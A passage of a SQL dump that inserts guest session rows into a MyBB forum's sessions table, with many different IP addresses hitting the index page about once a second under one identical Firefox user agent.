`uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('856c671fa570ea7ef829df06d39b7a20', '0', '103.14.102.216', '1352772255', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fa5228ade82ecf0915b1aaf6c2794d78', '0', '69.78.129.91', '1352772255', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('522a6436a2ea4667e15e3a1a67518abe', '0', '99.66.140.236', '1352772256', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2c42d1d334ec470ede8e0029e6c277bb', '0', '226.83.179.166', '1352772257', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0bc1689d56a2fe290981e65d1e0865c8', '0', '97.101.112.175', '1352772258', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dce26e0fea06be0bc58eee6a8fa0168d', '0', '213.28.83.156', '1352772259', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cbf100fc485fcb69fba917eed919f5ed', '0', '127.66.32.56', '1352772259', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0a5a3d3143bf6e92832fd07e34215a57', '0', '28.197.222.141', '1352772260', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1b5a2964e086195d744b67b866ac684a', '0', '244.55.100.228', '1352772260', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cafc1743d9cf8fb325559093d7a5dc8c', '0', '179.184.62.18', '1352772261', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('541b840768da435d9ac912dd67c96583', '0', '103.58.239.82', '1352772262', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b56de62c06e3f36d241dcca9cc3d864f', '0', '233.163.202.128', '1352772263', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d1082421ed2999f719089d2c11f2f0cc', '0', '199.43.115.38', '1352772263', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a6b8fb2adc420cf9d52c5a2151c16fc7', '0', '139.55.223.128', '1352772264', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7062b4cfa2aaed726be482aee5b5aa37', '0', '229.254.73.19', '1352772265', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('de1e4ea51302ccf3a0bd0ae070b07966', '0', '181.137.137.13', '1352772265', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('47488b88efb5308b72ce73881539321f', '0', '22.53.184.165', '1352772267', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c8120db9954e2d7cd6e61abba64083d2', '0', '175.222.86.171', '1352772267', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b32dbc2ee47aa65fcb17404d055e65e9', '0', '217.185.58.228', '1352772272', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e3ba3e0bf779d30e3286c2b4f4df9ba0', '0', '97.211.58.224', '1352772268', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ce378254d209a56b053b2da57381ee2d', '0', '111.163.23.149', '1352772269', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2e1a6531739b98d0dc978dff8c456efd', '0', '102.62.131.83', '1352772269', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('784005e30bb08af8c50dfaccc7c55805', '0', '155.198.205.61', '1352772270', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4c055080e74523ed4da6b365fc8ccff9', '0', '166.229.77.200', '1352772270', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d755647b90daa4f44ceda44673808b1a', '0', '50.93.148.143', '1352772272', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6f58093f1469987f790253ec6511d3ae', '0', '109.98.149.211', '1352772273', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('070694a9b59eb5081db716cc0a7ab21f', '0', '158.132.230.236', '1352772274', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b1956431e9d282188a5f5156a50c6761', '0', '232.38.215.110', '1352772275', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d209ebd5807fee371e3cefc15fc7c44b', '0', '30.21.7.20', '1352772276', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0235b80ba69247bc452fd85a90490801', '0', '152.140.159.82', '1352772276', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1fddbf12435889c5a7413d9b84383bba', '0', '115.237.49.184', '1352772277', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('25567aaddf23f69ff31c368e82365e69', '0', '77.146.76.101', '1352772277', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f3c325d82df03e4f05876a7db6c8cfab', '0', '1.65.13.86', '1352772278', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f1a309bcb0aeaf7a1b0819b542b776b8', '0', '57.186.32.73', '1352772279', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('42ef25b5a160a233e3144905d763f680', '0', '107.72.96.155', '1352772280', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9d880a36719b45dfa00a9c94ecc8564d', '0', '171.148.226.9', '1352772280', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9acc95a524e975e160bc8a3e9e72550e', '0', '246.183.150.202', '1352772281', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0284f309d894653d88af97126a2a0f88', '0', '77.128.216.72', '1352772281', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b4744d129d1bc056a3c4d2c717ad2d2c', '0', '214.242.127.255', '1352772282', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7b7610aefa2bdbae832afb09032d003e', '0', '253.85.121.26', '1352772283', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cabf1b4b40cdfa2e1e660c6d453ebcab', '0', '145.12.222.235', '1352772283', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cb11ad6805c91156fe340313898b5870', '0', '153.234.242.20', '1352772284', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3e8429146085d0e181ed4d34235b29cc', '0', '82.2.76.175', '1352772285', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d37b3d4d2e31ab972e2e68b7b9dd389b', '0', '232.221.39.48', '1352772286', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('096458ab2736361afde5faa02ec3df93', '0', '198.32.86.34', '1352772286', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7f0c39107a6de1e8d52567bc497daa66', '0', '159.40.64.56', '1352772287', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1c58e8d315b626debe890d2bdc109451', '0', '66.180.117.99', '1352772288', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bbaf1d59614041c15e7bf2616b176778', '0', '183.216.1.24', '1352772288', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e6e0c2fc48b7593da12632b9bf24b5a9', '0', '135.12.245.233', '1352772289', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('08960ee50ef60c1214fc322931694f8c', '0', '110.156.21.160', '1352772290', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bc94273faad85cbc04523d6a68ed0d52', '0', '130.225.152.146', '1352772291', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6120d79be1fabd0ea2e5a04f92aaec5f', '0', '118.184.90.122', '1352772291', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b6295eaa329888b01d9b4c11fa660c12', '0', '69.248.190.22', '1352772292', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('81a462319d7e7a9e852201bafd65510e', '0', '253.70.19.145', '1352772293', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0b87cdf60fda396d4ffa474604c6d03a', '0', '161.175.225.168', '1352772294', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c104a636d5f55951d79a3cb5af916a07', '0', '23.123.112.39', '1352772295', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('11a9923a750810b576bc0732f689e8ca', '0', '128.114.96.180', '1352772295', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('804198cc77d4133db0172476b5fbf127', '0', '243.176.17.175', '1352772296', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ed960ffb7cdf3388005258a2e2dc4904', '0', '219.203.129.225', '1352772297', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b207cefc873f451eb9c806819485ba38', '0', '71.167.161.221', '1352772297', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2848e444967d0ca6071c1995983015d0', '0', '62.145.193.251', '1352772298', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7d8dd1aa9dc4b16ddc64fa17abb79add', '0', '39.14.6.114', '1352772304', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('97e5e078e2de6ca106fdadb7bdf14983', '0', '109.109.132.23', '1352772299', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f827d24c6d84b2df925f181240378eb4', '0', '214.200.72.87', '1352772300', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('def675cc79a63c0f4b5ff6a05dca3f7a', '0', '58.160.165.207', '1352772301', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('60a7f9b8960d80a1c4e5f98405adbf35', '0', '50.146.229.73', '1352772302', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('93f8bea04e830d6293406a8f00d2ad12', '0', '44.191.143.239', '1352772302', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6a47c476f264ccd9a5538aaa3d4aeb32', '0', '247.104.69.207', '1352772303', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cb5015f41d8e6aee95aaa6e515076bae', '0', '242.99.93.91', '1352772304', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('da13bab59fab73648fe2752ff0a90b47', '0', '15.168.175.50', '1352772305', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cf4428b21248d23856458393e31fc524', '0', '167.24.245.57', '1352772306', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c9e17adb08a8de6544f50aa41ac34a6e', '0', '147.51.235.71', '1352772306', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0a7d01bb3dff5756253c6fa34e0649d0', '0', '149.90.246.62', '1352772308', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7f9bae4dfc3536ed506d024cc6d4d6ae', '0', '21.255.220.231', '1352772308', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9359090e11c3ed9041ac83fa7967767b', '0', '178.211.85.83', '1352772309', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0c69e2019793757cad31a910925fa195', '0', '79.220.223.141', '1352772309', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e313c3d2edd22e2e312fa9a72d6d21c6', '0', '238.184.88.250', '1352772310', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('910653e0e5692be4c9d7bf72cfc2d6ef', '0', '204.112.237.46', '1352772311', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7880289af34db3f67d435f3c3d09e4ac', '0', '61.205.167.46', '1352772311', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES 